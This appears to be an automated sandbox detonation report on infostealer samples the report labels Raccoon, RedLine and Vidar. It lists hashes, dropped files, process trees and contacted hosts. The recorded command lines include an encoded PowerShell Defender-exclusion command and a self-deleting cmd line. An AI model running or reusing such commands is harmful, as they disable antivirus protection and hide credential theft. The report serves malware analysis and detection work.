| SHA1 | 1895aaa8f5b8314d8a4c5938d1405775d3837109 |
| SHA256 | 1c1c5330ea35f518bf85fad69dc2da1a98a4dfeadbf6ac0ba0ac7cc51bbcc870 |
| SHA512 | 7fa5e582ad1bb094cbbb68b1db301dcf360e180eb58f8d726a112133277ceaa39660c6d4b3248c19a8b5767a4ae09f4597535711d789ca4f9f334a204d87ffe0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | fc4666cbca561e864e7fdf883a9e6661 |
| SHA1 | 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5 |
| SHA256 | 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b |
| SHA512 | c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4b16d9698a8ce99020662ace510a8781 |
| SHA1 | ff92d711e080d277890229da47bc1ce067feff03 |
| SHA256 | 96c886fd7e66a00051fd1c6c823315949204ed8ebb24c24c13198c5969c9c1f2 |
| SHA512 | b59e1e76dadaefe8a84815e3f39b4b6169132e6b923935bcd4e5ec28ebba8bde958f1462525cefec0110a9283090f636278680a6bfd03858611e366ab0cc178a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7988caec2e24d194d7dcecb39a3f45f8 |
| SHA1 | 097968f55c9d1b4368dedd13b34a741e5e8ab703 |
| SHA256 | 6a135dcc25bb7f05843e9eaf9b8c927cac218bd478c26dc4fb56960e1cbd42ad |
| SHA512 | 1cb4bd977c023a4a2de3c87a09343f3193358d8dd408babe838dcdc44b58582aa6e0dd932a81c135ba93a1462a6e99a290f941b8a83253ba1d6d58658ec39f35 |
C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll
| MD5 | 3c4d2f6fd240dc804e10bbb5f16c6182 |
| SHA1 | 30d66e6a1ead9541133bad2c715c1971ae943196 |
| SHA256 | 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e |
| SHA512 | 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d |
\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll
| MD5 | 3c4d2f6fd240dc804e10bbb5f16c6182 |
| SHA1 | 30d66e6a1ead9541133bad2c715c1971ae943196 |
| SHA256 | 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e |
| SHA512 | 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d |
memory/1800-110-0x0000000006490000-0x000000000650C000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8126C44C\Newtonsoft.Json.dll
| MD5 | 3c4d2f6fd240dc804e10bbb5f16c6182 |
| SHA1 | 30d66e6a1ead9541133bad2c715c1971ae943196 |
| SHA256 | 1f7a328eb4fa73df5d2996202f5dab02530b0339458137774c72731b9f85ca2e |
| SHA512 | 0657f0ab1d7fc9730d4bf6b8c8373f512d57a34063bcfa1f93a803b0afe2a93219da5dc679414dd155956bd696cb7547fc09663f8891eb9b03d9c93b3c1fe95d |
\Users\Admin\AppData\Local\Temp\GenericSetup.exe_1673806424\sciter32.dll
| MD5 | b431083586e39d018e19880ad1a5ce8f |
| SHA1 | 3bbf957ab534d845d485a8698accc0a40b63cedd |
| SHA256 | b525fdcc32c5a359a7f5738a30eff0c6390734d8a2c987c62e14c619f99d406b |
| SHA512 | 7805a3464fcc3ac4ea1258e2412180c52f2af40a79b540348486c830a20c2bbed337bbf5f4a8926b3ef98c63c87747014f5b43c35f7ec4e7a3693b9dbd0ae67b |
C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Extension.dll
| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Extension.dll
| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
memory/1800-117-0x0000000004CB0000-0x0000000004CDE000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8126C44C\MyDownloader.Extension.dll
| MD5 | 28f1996059e79df241388bd9f89cf0b1 |
| SHA1 | 6ad6f7cde374686a42d9c0fcebadaf00adf21c76 |
| SHA256 | c3f8a46e81f16bbfc75de44dc95f0d145213c8af0006bb097950ac4d1562f5ce |
| SHA512 | 9654d451cb2f184548649aa04b902f5f6aff300c6f03b9261ee3be5405527b4f23862d8988f9811987da22e386813e844e7c5068fd6421c91551f5b33c625f29 |
\Users\Admin\AppData\Local\setup10298.exe
| MD5 | 369acf60d8b5ed6168c74955ee04654f |
| SHA1 | 1753fff63efa6ed5ad30ede6b959261ac67dd13e |
| SHA256 | 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632 |
| SHA512 | 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643 |
memory/840-121-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\setup10298.exe
| MD5 | 369acf60d8b5ed6168c74955ee04654f |
| SHA1 | 1753fff63efa6ed5ad30ede6b959261ac67dd13e |
| SHA256 | 3ff8ec8f9f27a27f414a90bfed5b7f5a3c118b33cf0f80aeb7026e0a53e26632 |
| SHA512 | 2582b3b4525321fece978710403e4bd4dd6e9f0869de1fec784e4e79ac98e8c6498a601c9db45d5af4f1b99e3a2cc07b9e3ec18144e18ce82b41eb64ce4eb643 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
memory/1516-125-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe.config
| MD5 | fd63ee3928edd99afc5bdf17e4f1e7b6 |
| SHA1 | 1b40433b064215ea6c001332c2ffa093b1177875 |
| SHA256 | 2a2ddbdc4600e829ad756fd5e84a79c0401fa846ad4f2f2fb235b410e82434a9 |
| SHA512 | 1925cde90ee84db1e5c15fa774ee5f10fa368948df7643259b03599ad58cfce9d409fd2cd752ff4cbca60b4bbe92b184ff92a0c6e8b78849c4497d38266bd3b4 |
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe
| MD5 | 85b0a721491803f8f0208a1856241562 |
| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
memory/1516-130-0x00000000000D0000-0x00000000000DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
memory/1516-134-0x0000000000370000-0x000000000037C000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
memory/1516-138-0x0000000004E60000-0x000000000553A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
memory/1516-148-0x00000000006C0000-0x00000000006EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
memory/1516-142-0x00000000003E0000-0x0000000000408000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
Analysis: behavioral4
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win10v2004-20221111-en
Max time kernel
124s
Max time network
138s
Command Line
Signatures
PureCrypter
Raccoon
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 364 set thread context of 5032 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA3AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
Network
| Country | Destination | Domain | Proto |
| N/A | 20.189.173.15:443 | | tcp |
| N/A | 8.8.8.8:53 | falcaoliderfm.com.br | udp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 178.79.208.1:80 | | tcp |
| N/A | 178.79.208.1:80 | | tcp |
| N/A | 178.79.208.1:80 | | tcp |
| N/A | 93.184.221.240:80 | | tcp |
| N/A | 93.184.220.29:80 | | tcp |
| N/A | 77.73.133.23:80 | 77.73.133.23 | tcp |
Files
memory/364-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
memory/364-135-0x00000000000A0000-0x00000000000A8000-memory.dmp
memory/364-136-0x0000000004F10000-0x00000000054B4000-memory.dmp
memory/364-137-0x0000000004A50000-0x0000000004AE2000-memory.dmp
memory/364-138-0x0000000004C00000-0x0000000004C0A000-memory.dmp
memory/364-139-0x0000000007EB0000-0x0000000007ED2000-memory.dmp
memory/1180-140-0x0000000000000000-mapping.dmp
memory/1180-141-0x0000000002F60000-0x0000000002F96000-memory.dmp
memory/1180-142-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/1180-143-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/1180-144-0x0000000005F00000-0x0000000005F66000-memory.dmp
memory/1180-145-0x0000000006500000-0x000000000651E000-memory.dmp
memory/1180-146-0x0000000007E10000-0x000000000848A000-memory.dmp
memory/1180-147-0x0000000006A40000-0x0000000006A5A000-memory.dmp
memory/1020-148-0x0000000000000000-mapping.dmp
memory/5032-149-0x0000000000000000-mapping.dmp
memory/5032-150-0x0000000000400000-0x000000000041E000-memory.dmp
memory/372-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
memory/5032-154-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8ad6260b5656f92436334157a2a08961 |
| SHA1 | d1fe686740e0b72d1cfb956673c7293fba05869a |
| SHA256 | 9c475d6c0f06a27bff2ebf8b3749a4135ae52bf9259029c16c4d3668232bfd80 |
| SHA512 | 65ec7c87e1e9636e7a27a9ba51b6ce3b6b92e4245a2ef504c895818f29cb9486c0f43cb52750c692e17eda6205058cc29eb2d5de742b203b710fdee19d61ae45 |
memory/5032-157-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/372-159-0x0000000006960000-0x0000000006992000-memory.dmp
memory/372-160-0x0000000070D90000-0x0000000070DDC000-memory.dmp
C:\Users\Admin\AppData\LocalLow\sqlite3.dll
| MD5 | dbf4f8dcefb8056dc6bae4b67ff810ce |
| SHA1 | bbac1dd8a07c6069415c04b62747d794736d0689 |
| SHA256 | 47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68 |
| SHA512 | b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1 |
C:\Users\Admin\AppData\LocalLow\nss3.dll
| MD5 | f67d08e8c02574cbc2f1122c53bfb976 |
| SHA1 | 6522992957e7e4d074947cad63189f308a80fcf2 |
| SHA256 | c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e |
| SHA512 | 2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5 |
C:\Users\Admin\AppData\LocalLow\mozglue.dll
| MD5 | f07d9977430e762b563eaadc2b94bbfa |
| SHA1 | da0a05b2b8d269fb73558dfcf0ed5c167f6d3877 |
| SHA256 | 4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862 |
| SHA512 | 6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf |
memory/372-164-0x0000000006930000-0x000000000694E000-memory.dmp
memory/372-165-0x0000000007720000-0x000000000772A000-memory.dmp
memory/372-166-0x0000000007970000-0x0000000007A06000-memory.dmp
memory/372-167-0x0000000006A10000-0x0000000006A1E000-memory.dmp
memory/372-168-0x00000000078D0000-0x00000000078EA000-memory.dmp
memory/372-169-0x00000000078B0000-0x00000000078B8000-memory.dmp
memory/5032-170-0x0000000000400000-0x000000000041E000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:17
Platform
win7-20221111-en
Max time kernel
142s
Max time network
154s
Command Line
Signatures
RedLine
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 568 set thread context of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 36
Network
| Country | Destination | Domain | Proto |
| N/A | 82.115.223.46:57672 | | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win7-20221111-en
Max time kernel
26s
Max time network
34s
Command Line
Signatures
Vidar
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1800 set thread context of 296 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win10v2004-20220812-en
Max time kernel
140s
Max time network
158s
Command Line
Signatures
Vidar
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2512 set thread context of 4888 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
Network
| Country | Destination | Domain | Proto |
| N/A | 93.184.220.29:80 | | tcp |
| N/A | 8.8.8.8:53 | t.me | udp |
| N/A | 149.154.167.99:443 | t.me | tcp |
| N/A | 49.12.113.110:80 | 49.12.113.110 | tcp |
| N/A | 95.101.78.82:80 | | tcp |
